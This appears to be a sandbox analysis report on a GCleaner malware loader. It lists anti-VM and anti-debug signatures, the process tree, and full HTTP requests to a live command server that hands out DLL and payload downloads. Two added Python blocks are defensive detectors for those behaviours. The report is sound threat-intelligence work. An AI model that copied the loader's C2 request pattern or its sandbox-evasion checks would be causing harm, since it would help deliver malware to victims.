Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    10/12/2024, 05:52 UTC

General

  • Target

    file.exe

  • Size

    1.9MB

  • MD5

    ae289ab30dfebf9432c69040df09a610

  • SHA1

    6039324f5b9ff482f2111b0fe1427c6b0aa64c14

  • SHA256

    d6f64f42200504958f0d75af57b0766aab46ac3ccd770cb1e5cc91927579d9fb

  • SHA512

    8165695a7160d1be996c2fb17eb157bf0dfdfc451029c7879db5de0876d4e9c623ef0842b134a1bcc4ff58109abe242f03a8f76b68a7159b4b5ea56e5a3204f3

  • SSDEEP

    49152:avuT7x1eCVwcjoPhV/s9QapGNoGLb9AIETMhdZ:avGx1eHcqD09MoG1v

Malware Config

Signatures

  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs, 1 IoC)
  • Downloads MZ/PE file
  • Checks BIOS information in registry (2 TTPs, 2 IoCs)

    BIOS information is often read in order to detect sandboxing environments.

  • Identifies Wine through registry keys (2 TTPs, 1 IoC)

    Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.

  • Suspicious use of NtSetInformationThreadHideFromDebugger (1 IoC)
  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s).

  • Program crash (1 IoC)
  • System Location Discovery: System Language Discovery (1 TTP, 1 IoC)

    Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses (2 IoCs)
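
The four anti-analysis signatures above (VirtualBox ACPI values, BIOS values, Wine keys, ThreadHideFromDebugger) are the kind of thing a detection engineer re-derives from a report like this. The block below is an added example, not code from the tria.ge report or from the GCleaner sample: it classifies constructed procmon-style registry and API events for PID 4192 against those signatures. The key paths (HKLM\HARDWARE\ACPI\DSDT\VBOX__, the SystemBiosVersion/VideoBiosVersion values, HKCU\Software\Wine) and the THREADINFOCLASS value 0x11 are the values these checks are commonly built on and are assumptions here; the report does not print what the sample actually read.

```python
# Added example: not code from the tria.ge report or the GCleaner sample.
# Classifies registry/API events against the report's anti-analysis signatures.
import re
from collections import defaultdict

# THREADINFOCLASS ThreadHideFromDebugger (documented constant, 0x11).
THREAD_HIDE_FROM_DEBUGGER = 0x11

# Registry paths these checks are commonly built on. They are assumptions:
# the report names the signature, not the exact key or value the sample read.
REGISTRY_SIGNATURES = [
    ("Identifies VirtualBox via ACPI registry values (likely anti-VM)",
     re.compile(r"^HKLM\\HARDWARE\\ACPI\\(DSDT|FADT|RSDT)\\VBOX__", re.I)),
    ("Checks BIOS information in registry",
     re.compile(r"^HKLM\\HARDWARE\\DESCRIPTION\\System\\"
                r"(SystemBiosVersion|SystemBiosDate|VideoBiosVersion)$", re.I)),
    ("Identifies Wine through registry keys",
     re.compile(r"^HKCU\\Software\\Wine(\\|$)", re.I)),
]


def classify_event(event):
    """Return the signature name an event triggers, or None if it is benign."""
    op = event["op"]
    if op in ("RegOpenKey", "RegQueryValue"):
        for name, pattern in REGISTRY_SIGNATURES:
            if pattern.search(event["path"]):
                return name
    elif (op == "NtSetInformationThread"
          and event.get("info_class") == THREAD_HIDE_FROM_DEBUGGER):
        return "Suspicious use of NtSetInformationThreadHideFromDebugger"
    return None


def summarize(events):
    """Map each PID to the sorted list of signatures its events triggered."""
    hits = defaultdict(set)
    for event in events:
        name = classify_event(event)
        if name:
            hits[event["pid"]].add(name)
    return {pid: sorted(names) for pid, names in hits.items()}


# Constructed events for PID 4192 (file.exe in the report) plus a benign read
# from another process. Illustrative input, not sandbox output.
SAMPLE_EVENTS = [
    {"pid": 4192, "op": "RegOpenKey", "path": r"HKLM\HARDWARE\ACPI\DSDT\VBOX__"},
    {"pid": 4192, "op": "RegQueryValue",
     "path": r"HKLM\HARDWARE\DESCRIPTION\System\SystemBiosVersion"},
    {"pid": 4192, "op": "RegOpenKey", "path": r"HKCU\Software\Wine"},
    {"pid": 4192, "op": "NtSetInformationThread", "info_class": THREAD_HIDE_FROM_DEBUGGER},
    {"pid": 4192, "op": "NtSetInformationThread", "info_class": 0x0},  # ThreadBasicInformation
    {"pid": 1234, "op": "RegQueryValue",
     "path": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"},
]

if __name__ == "__main__":
    for pid, names in summarize(SAMPLE_EVENTS).items():
        print(pid, names)
```

Only PID 4192 comes back with hits; the Run-key read by the other process and the ThreadBasicInformation call are left alone, which is the point of matching on the specific info class rather than on the API name.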

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    PID:4192
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4192 -s 1460
      2⤵
      • Program crash
      PID:2440
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4192 -ip 4192
    1⤵
      PID:3076

    Network

    • flag-us
      DNS
      8.8.8.8.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      8.8.8.8.in-addr.arpa
      IN PTR
      Response
      8.8.8.8.in-addr.arpa
      IN PTR
      dns.google
    • flag-us
      DNS
      172.214.232.199.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      172.214.232.199.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      241.150.49.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      241.150.49.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      76.32.126.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      76.32.126.40.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      95.221.229.192.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      95.221.229.192.in-addr.arpa
      IN PTR
      Response
    • flag-nl
      GET
      http://80.82.65.70/add?substr=mixtwo&s=three&sub=emp
      file.exe
      Remote address:
      80.82.65.70:80
      Request
      GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1
      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
      User-Agent: 1
      Host: 80.82.65.70
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Tue, 10 Dec 2024 05:52:25 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Length: 1
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-nl
      GET
      http://80.82.65.70/dll/key
      file.exe
      Remote address:
      80.82.65.70:80
      Request
      GET /dll/key HTTP/1.1
      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
      User-Agent: 1
      Host: 80.82.65.70
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Tue, 10 Dec 2024 05:52:25 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Length: 21
      Keep-Alive: timeout=5, max=99
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-nl
      GET
      http://80.82.65.70/dll/download
      file.exe
      Remote address:
      80.82.65.70:80
      Request
      GET /dll/download HTTP/1.1
      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
      User-Agent: 1
      Host: 80.82.65.70
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Tue, 10 Dec 2024 05:52:26 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Disposition: attachment; filename="fuckingdllENCR.dll";
      Content-Length: 97296
      Keep-Alive: timeout=5, max=98
      Connection: Keep-Alive
      Content-Type: application/octet-stream
    • flag-nl
      GET
      http://80.82.65.70/files/download
      file.exe
      Remote address:
      80.82.65.70:80
      Request (sent 11 times on the same persistent connection, at 05:52:26, :28, :30, :32, :34, :37, :39, :41, :43, :45 and :47 UTC; the request headers are identical each time)
      GET /files/download HTTP/1.1
      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
      User-Agent: C
      Host: 80.82.65.70
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response (identical each time apart from Date and the Keep-Alive max counter, which counts down from 97 to 87)
      HTTP/1.1 200 OK
      Date: Tue, 10 Dec 2024 05:52:26 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Length: 1
      Keep-Alive: timeout=5, max=97
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-nl
      GET
      http://80.82.65.70/soft/download
      file.exe
      Remote address:
      80.82.65.70:80
      Request
      GET /soft/download HTTP/1.1
      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
      User-Agent: d
      Host: 80.82.65.70
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Tue, 10 Dec 2024 05:52:51 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Disposition: attachment; filename="dll";
      Content-Length: 242176
      Keep-Alive: timeout=5, max=86
      Connection: Keep-Alive
      Content-Type: application/octet-stream
    • flag-nl
      GET
      http://80.82.65.70/soft/download
      file.exe
      Remote address:
      80.82.65.70:80
      Request
      GET /soft/download HTTP/1.1
      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
      User-Agent: s
      Host: 80.82.65.70
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Tue, 10 Dec 2024 05:52:51 GMT
      Server: Apache/2.4.58 (Ubuntu)
      Content-Disposition: attachment; filename="soft";
      Content-Length: 1502720
      Keep-Alive: timeout=5, max=85
      Connection: Keep-Alive
      Content-Type: application/octet-stream
    • flag-us
      DNS
      70.65.82.80.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      70.65.82.80.in-addr.arpa
      IN PTR
      Response
      70.65.82.80.in-addr.arpa
      IN PTR
      security.criminalip.com
    • flag-us
      DNS
      196.249.167.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      196.249.167.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      228.249.119.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      228.249.119.40.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      200.163.202.172.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      200.163.202.172.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      18.31.95.13.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      18.31.95.13.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      134.71.91.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      134.71.91.104.in-addr.arpa
      IN PTR
      Response
      134.71.91.104.in-addr.arpa
      IN PTR
      a104-91-71-134.deploy.static.akamaitechnologies.com
    • flag-us
      DNS
      83.210.23.2.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      83.210.23.2.in-addr.arpa
      IN PTR
      Response
      83.210.23.2.in-addr.arpa
      IN PTR
      a2-23-210-83.deploy.static.akamaitechnologies.com
    • flag-us
      DNS
      22.49.80.91.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      22.49.80.91.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      29.243.111.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      29.243.111.52.in-addr.arpa
      IN PTR
      Response
    • 80.82.65.70:80 (http; process file.exe; last URL http://80.82.65.70/soft/download)
      sent 70.2kB in 1391 packets, received 1.9MB in 1389 packets
      HTTP requests on this connection, every one answered with 200:
      GET http://80.82.65.70/add?substr=mixtwo&s=three&sub=emp
      GET http://80.82.65.70/dll/key
      GET http://80.82.65.70/dll/download
      GET http://80.82.65.70/files/download (11 times)
      GET http://80.82.65.70/soft/download (2 times)
    • 8.8.8.8:53 (dns; one query packet sent and one reply received per name; bytes sent / received)
      8.8.8.8.in-addr.arpa  66 B / 90 B
      172.214.232.199.in-addr.arpa  74 B / 128 B
      241.150.49.20.in-addr.arpa  72 B / 158 B
      76.32.126.40.in-addr.arpa  71 B / 157 B
      95.221.229.192.in-addr.arpa  73 B / 144 B
      70.65.82.80.in-addr.arpa  70 B / 107 B
      196.249.167.52.in-addr.arpa  73 B / 147 B
      228.249.119.40.in-addr.arpa  73 B / 159 B
      200.163.202.172.in-addr.arpa  74 B / 160 B
      18.31.95.13.in-addr.arpa  70 B / 144 B
      134.71.91.104.in-addr.arpa  72 B / 137 B
      83.210.23.2.in-addr.arpa  70 B / 133 B
      22.49.80.91.in-addr.arpa  70 B / 145 B
      29.243.111.52.in-addr.arpa  72 B / 158 B
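
What the traffic above shows, reduced to detection logic: every request carries a hard-coded Accept-Language of ru-RU although the sandbox locale is en-us, the User-Agent is a single character that changes per stage (1, C, d, s), /files/download is polled about every two seconds and answered with a one-byte body, and the real payloads arrive as Content-Disposition attachments over plain HTTP. The block below is an added example, not part of the tria.ge report or of the GCleaner code: its transcript is constructed from the headers above, trimmed to the ones the heuristics use, the thresholds and the sandbox_locale parameter are assumptions, and the last function shows that the 1-byte download[1].htm in the Downloads section (MD5 cfcd208495d565ef66e7dff9f98764da) is the single character 0.

```python
# Added example: not code from the tria.ge report or the GCleaner sample.
import hashlib
import re
from collections import Counter, defaultdict

# Constructed transcript: the report's request/response pairs trimmed to the
# headers the heuristics use (one /add, one /dll, two /files polls, one /soft).
TRANSCRIPT = """\
GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
User-Agent: 1

HTTP/1.1 200 OK
Content-Length: 1

GET /dll/download HTTP/1.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
User-Agent: 1

HTTP/1.1 200 OK
Content-Disposition: attachment; filename="fuckingdllENCR.dll";
Content-Length: 97296

GET /files/download HTTP/1.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
User-Agent: C

HTTP/1.1 200 OK
Content-Length: 1

GET /files/download HTTP/1.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
User-Agent: C

HTTP/1.1 200 OK
Content-Length: 1

GET /soft/download HTTP/1.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
User-Agent: s

HTTP/1.1 200 OK
Content-Disposition: attachment; filename="soft";
Content-Length: 1502720
"""


def parse_exchanges(text):
    """Pair each request block with the response block that follows it."""
    blocks = [b.strip().splitlines() for b in re.split(r"\n\s*\n", text.strip())]
    exchanges = []
    for req, resp in zip(blocks[0::2], blocks[1::2]):
        req_h = dict(line.split(": ", 1) for line in req[1:])
        resp_h = dict(line.split(": ", 1) for line in resp[1:])
        fname = re.search(r'filename="([^"]*)"', resp_h.get("Content-Disposition", ""))
        exchanges.append({
            "path": req[0].split()[1],
            "ua": req_h.get("User-Agent", ""),
            "lang": req_h.get("Accept-Language", ""),
            "status": int(resp[0].split()[1]),
            "length": int(resp_h.get("Content-Length", "0")),
            "filename": fname.group(1) if fname else None,
        })
    return exchanges


def flag_beaconing(exchanges, sandbox_locale="en-us", poll_threshold=2):
    """Heuristics read off the traffic above; thresholds are assumptions."""
    findings = defaultdict(set)
    polls = Counter(e["path"] for e in exchanges if e["length"] <= 1)
    for path, n in polls.items():
        if n >= poll_threshold:             # task queue polled, empty reply
            findings["polled_with_empty_reply"].add(path)
    for e in exchanges:
        if len(e["ua"]) == 1:               # "1", "C", "d", "s": per-stage marker
            findings["single_char_user_agent"].add(e["ua"])
        lang = e["lang"].split(",")[0].lower()
        if lang and lang != sandbox_locale:  # hard-coded ru-RU on an en-us host
            findings["accept_language_mismatch"].add(lang)
        if e["filename"] and e["length"] > 0:
            findings["payload_download"].add((e["path"], e["filename"], e["length"]))
    return {k: sorted(v) for k, v in findings.items()}


def identify_one_byte_body(md5_hex):
    """Recover a 1-byte HTTP body from the hash the sandbox reports for it."""
    for value in range(256):
        body = bytes([value])
        if hashlib.md5(body).hexdigest() == md5_hex:
            return body
    return None
```

flag_beaconing(parse_exchanges(TRANSCRIPT)) returns the polled path, the three single-character agents, the ru-ru locale mismatch and the two attachment downloads with their sizes; identify_one_byte_body on the Downloads-section MD5 returns b"0", which is what an empty task queue looks like on the wire here. The 1-byte /add and /files/download replies are worth alerting on even without the payload fetches, since they recur with a fixed cadence and a fixed one-character User-Agent.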

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\FQRZN8O7\download[1].htm

      Filesize

      1B

      MD5

      cfcd208495d565ef66e7dff9f98764da

      SHA1

      b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

      SHA256

      5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

      SHA512

      31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

    • memory/4192-15-0x0000000000400000-0x0000000000C5D000-memory.dmp

      Filesize

      8.4MB

    • memory/4192-18-0x0000000000400000-0x0000000000C5D000-memory.dmp

      Filesize

      8.4MB

    • memory/4192-3-0x0000000000400000-0x0000000000C5D000-memory.dmp

      Filesize

      8.4MB

    • memory/4192-4-0x0000000000400000-0x0000000000C5D000-memory.dmp

      Filesize

      8.4MB

    • memory/4192-6-0x0000000000400000-0x0000000000C5D000-memory.dmp

      Filesize

      8.4MB

    • memory/4192-7-0x0000000000400000-0x0000000000C5D000-memory.dmp

      Filesize

      8.4MB

    • memory/4192-11-0x0000000010000000-0x000000001001C000-memory.dmp

      Filesize

      112KB

    • memory/4192-0-0x0000000000400000-0x0000000000C5D000-memory.dmp

      Filesize

      8.4MB

    • memory/4192-2-0x0000000000401000-0x0000000000427000-memory.dmp

      Filesize

      152KB

    • memory/4192-20-0x0000000000400000-0x0000000000C5D000-memory.dmp

      Filesize

      8.4MB

    • memory/4192-17-0x0000000000401000-0x0000000000427000-memory.dmp

      Filesize

      152KB

    • memory/4192-21-0x0000000000400000-0x0000000000C5D000-memory.dmp

      Filesize

      8.4MB

    • memory/4192-1-0x0000000077854000-0x0000000077856000-memory.dmp

      Filesize

      8KB

    • memory/4192-23-0x0000000000400000-0x0000000000C5D000-memory.dmp

      Filesize

      8.4MB

    • memory/4192-28-0x0000000000400000-0x0000000000C5D000-memory.dmp

      Filesize

      8.4MB

    • memory/4192-34-0x0000000000400000-0x0000000000C5D000-memory.dmp

      Filesize

      8.4MB

    • memory/4192-40-0x0000000000400000-0x0000000000C5D000-memory.dmp

      Filesize

      8.4MB
